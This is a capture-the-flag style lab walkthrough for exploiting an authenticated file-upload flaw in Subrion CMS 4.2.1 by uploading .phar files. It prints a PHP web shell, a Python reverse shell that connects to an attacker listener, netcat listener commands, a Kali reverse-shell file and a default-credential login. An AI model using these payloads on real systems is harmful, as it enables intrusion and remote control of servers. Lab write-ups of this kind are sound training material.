Subrion CMS could allow a remote authenticated attacker to upload arbitrary files, caused by the improper validation of file extensions by the /panel/uploads URI. By sending a specially-crafted HTTP request, a remote attacker could exploit this vulnerability to upload a malicious PHP script, which could allow the attacker to execute arbitrary PHP code on the vulnerable system.

/panel/uploads in Subrion CMS 4.2.1 allows remote attackers to execute arbitrary PHP code via a .pht or .phar file, because the .htaccess file omits these.

Affect version

  • 4.2.1


1. To identify the version of the Subrion application you can navigate to /panel/

  • http://ip/panel/
  • http://exfiltrated.offsec/login/

2. You can use curl to get the page info

  • curl http://exfiltrated.offsec/panel/ | grep -i Subrion

Exploitation (Script)

1. Now that we know the Subrion CMS version we can proceed search for exploits that apply

  • searchsploit Subrion 4.2.1

2. Looking at the results, I would use the “Arbitrary File Upload”, (, so, I download it

  • searchsploit -m php/webapps/
  • python

3. After successful download, we proceed to test the script, we need to provide the credentials as this is an authenticated attack. You can brute force the credentials or try to use the default ones, admin/admin, in my case the default credentials were set

  • python -u http://exfiltrated.offsec/panel/ -l admin -p admin
  • whoami

Exploitation (Manual)

1. Having already the credentials proceed to log into the Subrion CMS console

  • http://exfiltrated.offsec/panel/
  • admin/admin

2. Once, authenticated, go to http://[address]:[port]/[app_path]/panel/uploads

  • http://exfiltrated.offsec/panel/uploads/

3. We will create a php file that prints text as a Proof of Concept, the file extension should be either pht or .phar

  • vi php_poc.phar
  • cat php_poc.phar
  • <?php echo “Vry4n was here!”; ?>

4. Proceed to upload it to Subrion CMS, and check the location, in this case (uploads/php_poc.phar)

5. Navigate to that location, as you can see code has been executed

  • http://exfiltrated.offsec/uploads/php_poc.phar

6. Now we can try to upload a basic line of code to proof we can run commands

  • vi php_code.phar
  • cat php_code.phar
  • <?php system($_GET[‘cmd’]); ?>

7. Repeat the upload step, and visit the file, then use the variable cmd followed by the command you need

  • http://exfiltrated.offsec/uploads/php_code.phar?cmd=whoami

8. We can run a python reverse shell, start a local listener in our attacking machine

  • nc -lvp 1234

9. I used to create a python3 reverse shell

  • http://exfiltrated.offsec/uploads/php_code.phar?cmd=python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“sh”)’
  • whoami


1. We can try to use a webshell, we will edit the one in our local Kali machine /usr/share/webshells/php/php-reverse-shell.php

  • cp /usr/share/webshells/php/php-reverse-shell.php ~/Desktop/php-reverse-shell.php
  • cd ~/Desktop
  • mv php-reverse-shell.php php-reverse-shell.phar
  • vi php-reverse-shell.phar

2. Start a listener

  • nc -lvp 1234

3. Upload it to the Subrion CMS, and then execute the .phar file, we should have a connection back

  • http://exfiltrated.offsec/uploads/php-reverse-shell.phar
  • whoami


No remedy available as of November 14, 2018.
